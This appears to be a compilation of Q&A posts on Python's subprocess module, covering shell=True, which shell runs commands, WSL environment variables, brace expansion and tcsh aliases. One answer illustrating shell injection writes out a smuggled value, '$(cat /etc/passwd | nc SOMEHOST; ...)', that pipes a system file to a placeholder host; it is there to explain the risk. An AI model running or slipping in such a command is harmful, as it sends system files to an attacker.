Im using Ubuntu 20 with zsh. When I using subprocess.call, it always using bash to exec command but not zsh. How should I do to fix this?
No, it uses sh regardless of which shell is your login shell.
There is a keyword argument to select a different shell, but you should generally run as little code as possible in a subshell; mixing nontrivial shell script with Python means the maintainer has to understand both languages.
whatever = subprocess.run(
'echo $SHELL',
shell=True, executable='/usr/bin/zsh',
check=True)
(This will echo your login shell, so the output would be /usr/bin/zsh even if you ran this without executable, or with Bash instead.)
In many situations, you should avoid shell=True entirely if you can.
Related
I am trying to call mvn commands from Python, for this subprocess module has to be used.
The problem is, this has been working for a long time and all of a sudden does not work anymore, because the executed Maven commands complain about JAVA_HOME not being set, even though it is when i manually type echo $JAVA_HOME into the shell.
I have no idea why it stopped working all of a sudden.
What i would expect
command= "echo $JAVA_HOME"
proc = subprocess.Popen(['bash', '-c', command],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output, err = proc.communicate()
print(str(output))
prints the path to my Java JDK.
$ echo $JAVA_HOME
prints the path to my Java JDK.
What happens instead
command= "echo $JAVA_HOME"
proc = subprocess.Popen(['bash', '-c', command],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output, err = proc.communicate()
print(str(output))
prints b'\n'
$ echo $JAVA_HOME
prints epath/to/my/java/jdk
What i already tried
Using shell=True in Popen: Works, but is discouraged due to security risks and it seems to use /bin/sh when executed on our Jenkins, which makes the script crash because some commands are only executable when using bash. It worked without it too, so there must be a way to get along without it.
adding env=os.environ.copy() as argument to Popen: No effect..Even when specifying the JAVA_HOME explicitly using env
Moving the JDK to a path with no weird spaces or anything like that: No effect...
Checking the output of os.environ['JAVA_HOME']: Prints the path to my Java JDK
Information
I am still using the same python version. I did not update anything that could have caused this weird behavior all of a sudden, at least i wouldnt know what it is.
I am using Windows 10 Enterprise, x64 based
I am using GIT Bash
I am using Python 3.8.5
Update 1:
After reading something about problems of shared environment variables between WSL and Windows, i discovered that i can specify shared variables by setting a environment variable 'WSLENV'. I added JAVA_HOME/p to it and now Python subprocess no longer prints b'\n', but b'/tmp/docker-desktop-root/mnt/host/c/Users/user/Desktop/jdk11\n'. So the problem seems to be WSL (?).
Unfortunately, Maven still says JAVA_HOME should point to a JDK not a JRE, so this path seems not to work.
Update 2:
By changing the WSLENV variable's content from JAVA_HOME/p to JAVA_HOME/u, the subprocess now prints the correct path to the JDK. Still, Maven fails with the same error message..
Update 3:
For making it work with WSL enabled, check out my answer below
I found a way to make it work with WSL enabled, it is kinda ugly but it seems to work.
command = "mvn --version"
proc = subprocess.Popen(['wsl', 'bash.exe', '-c', command],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output, err = proc.communicate()
print(str(output))
print(str(err))
By appending wsl and bash.exe i managed to make it work, the output is the basic output from mvn --version just like expected. Notice the .exe which seems to tell WSL to use the same bash executable like in normal usage without subprocess.
Without the .exe, WSL seems to use a different bash executable, where JAVA_HOME is not defined or at least maven complains about it with the error message that i already mentioned above.
Notice that this code probably won't work when WSL is not enabled, so you would need to programmatically test if WSL is enabled and then modify the command accordingly.
Im still searching for any solution where i dont need to modify the process args, i am gonna update if i will find one.
I am a beginner in Python and can you kindly help me understand the following concept.
If I do the following,
import subprocess
subprocess.run(['ls'])
Here we know that the key word argument, shell is set to False by default so that the 'ls' does not run on the shell. But my question is if it does not run on the shell, on where does it run and how can it give me an output?
I have a windows system but it should work the same.
For getting the output of subprocess you can use check_output.
On windows -
import subprocess
subprocess.check_output(["dir"], shell=True)
running this code without shell=True will result in an error.
If I want to run the code above with shell=False
I would do something like this -
subprocess.check_output(["cmd","/c","dir"], shell=False)
Notice -
On Unix with shell=True, the shell defaults to /bin/sh.
That means when you pass command and use shell=True
it will use /bin/sh to run that command.
I'm trying to kill a specific python process launched earlier, lets call it test.py.
The command in linux which terminates it is : sudo pkill -f test.py-> works like a charm.
However when trying to launch via python code:
subprocess.Popen('sudo pkill -f test.py', stdout=subprocess.PIPE)
I get a stacktrace with OSError: [Errno 2] No such file or directory
Any idea what am I doing wrong?
By default, subprocess.Popen will interpret a string argument as the exact command name. So, you pass a string foo bar, it will attempt to locate an executable named foo bar and invoke it without arguments. Unlike an interactive shell, it will not execute the command foo with the single argument bar.
When you type foo "bar baz" or foo | bar into a shell, it is the shell that splits the argument line into words and interprets those words as command name, arguments, pipe delimiters, redirection operators, etc. The simplest way for subprocess.Popen to do this kind of input interpretation same is by using shell=True to request that the argument be passed through a shell:
subprocess.Popen('sudo pkill -f test.py', shell=True, stdout=subprocess.PIPE)
Unfortunately, as noted in the documentation, this convenient shortcut has security implications. Using shell=True is safe as long as the command to run is fixed (and ignoring the obvious security implications of allowing apparently password-less sudo.) The problem arises when the arguments are assembled from pieces that come from other sources. For example:
# XXX security risk
subprocess.Popen('sudo pkill -f %s' % socket.read(), shell=True,
stdout=subprocess.PIPE)
Here we are reading the argument from a network connection, and splicing it into a string passed to the shell. Aside from the obvious problem of a maliciously crafted peer being able to kill an arbitrary process on the system (as root, no less), it is actually worse than that. Since the shell is a general tool, an attacker can use command substitution and similar features to make the system do anything it wants. For example, if the socket sends the string $(cat /etc/passwd | nc SOMEHOST; echo process-name), the Popen above will use the shell to execute:
sudo pkill -f $(cat /etc/passwd | nc SOMEHOST; echo process-name)
This is why it is generally advised not to use shell=True on untrusted input. A safer alternative is to avoid running the shell:
# smaller risk
cmd = ['sudo', 'pkill', '-f', socket.read()]
subprocess.Popen(cmd, stdout=subprocess.PIPE)
In this case, even if a malicious peer slips something weird into the string, it will not be a problem because it will be literally sent to the command to execute. In the above example, the pkill command would get a request to kill a process named $(cat ...), but there would be no shell to interpret this request to execute the command inside the parentheses.
Even without a shell, invocation of external commands with untrusted input can still be unsafe in case the command executed (in this case sudo or pkill) is itself vulnerable to injection attacks.
I wrote a simple piece of code:
import subprocess
p=subprocess.Popen('mkdir -p ./{a,b,c}', shell=True, stderr=subprocess.STDOUT)
p.wait()
Unfortunately, it not always behaves the way I'd expect. I.e, when I run it on my PC, everything is OK (ls -l gives me three dirs: a, b and c). But when my colleague runs it on his desktop, he gets... one dir named: '{a,b,c}' ... We both use Python 2.7.3. Why is that? How would you fix it?
I tried to find the answer by myself. According to manual:
"args should be a sequence of program arguments or else a single string. By default, the program to execute is the first item in args if args is a sequence. If args is a string, the interpretation is platform-dependent and described below. See the shell and executable arguments for additional differences from the default behavior. Unless otherwise stated, it is recommended to pass args as a sequence."
So I tried to execute the code in shell:
python -c "import subprocess; p=subprocess.Popen(['mkdir', '-p', './{ea,fa,ga}'], shell=True, stderr=subprocess.STDOUT); p.wait()"
And I got:
mkdir: missing operand
I will be thankful for any advice
Thanks!
The ./{a,b,c} syntax is bash syntax, not supported by all shells.
The documentation says:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a
string, the string specifies the command to execute through the shell.
So your command only works if /bin/sh is symlinked to a shell that supports that syntax, like bash or zsh. Your colleague is probably using dash or another shell that doesn't support this.
You should no be relying in something like a user's default shell. Instead, write the full command with the full expansion:
p = subprocess.Popen('mkdir -p ./a ./b ./c', shell=True, stderr=subprocess.STDOUT)
There's several problems here.
First: if you are using a sequence of arguments, do not set "shell = True" (this is recommended in the Popen manual). Set it to False, and you'll see that your mkdir command will be accepted.
"./{a,b,c}" is AFAIK a specific syntax in bash. If your colleague is using a different shell, it will probably not work, or behave differently.
You should use the python "mkdir" command instead of calling a shell command, it will work whatever the server / shell / OS.
Thank you all for your answers.
It seems, that the best way is simply use /bin/sh syntax. I changed my code to use:
'mkdir -p ./a ./b ./c'
as you suggested.
I avoided to use mkdir() function, because I am writing a scripts with plenty of system calls, and I wanted to provide elegant --dry-run option (so I could list all of the commands).
Problem solved - thank you!
The os.mkdir(path,[mode]) method are as far as I understand safer to use when working on multiplatform projects.
os.mkdir(os.getcwd()/a)
However its not as elegant as taking the subprocess approach.
I am trying to created aliases for tcsh from a python script (running Python 2.7.1).
Once the aliases are created I want to use them in the same shell I ran the python script in.
I tried:
os.system('alias test "echo test"')
but I get the following error:
sh: line 0: alias: test: not found
sh: line 0: alias: echo test: not found
I then tried:
os.system(r"""/bin/csh -i -c 'alias test "echo test"'""")
And then no errors occurred, but the alias did not register, and therefore I could not use it.
The result I'm looking for is this:
tcsh>python my_script.py
tcsh>test
test
Thanks!
os.system executes that command in a subshell (the bourne shell by the look of it), so even if your syntax was correct alias test="echo test", it would not persist after the call (since the subshell closed).
But this seems like an XY question. You ask about Y - the solution you had in mind, and not about X - your problem.
If you simply want to create a bunch of aliases at once, why not use a c-shell script!? (Why you are torturing yourself with c-shell is another matter entirely).
Your python script cannot execute anything in the context of your shell. While you could use subprocess.call(..., shell=True) this would use a new shell and thus not update your existing shell.
The only way to do what you want is to make your python script write valid shell commands to stdout and then, instead of just executing it, you need to make your shell evaluate the output of your python script.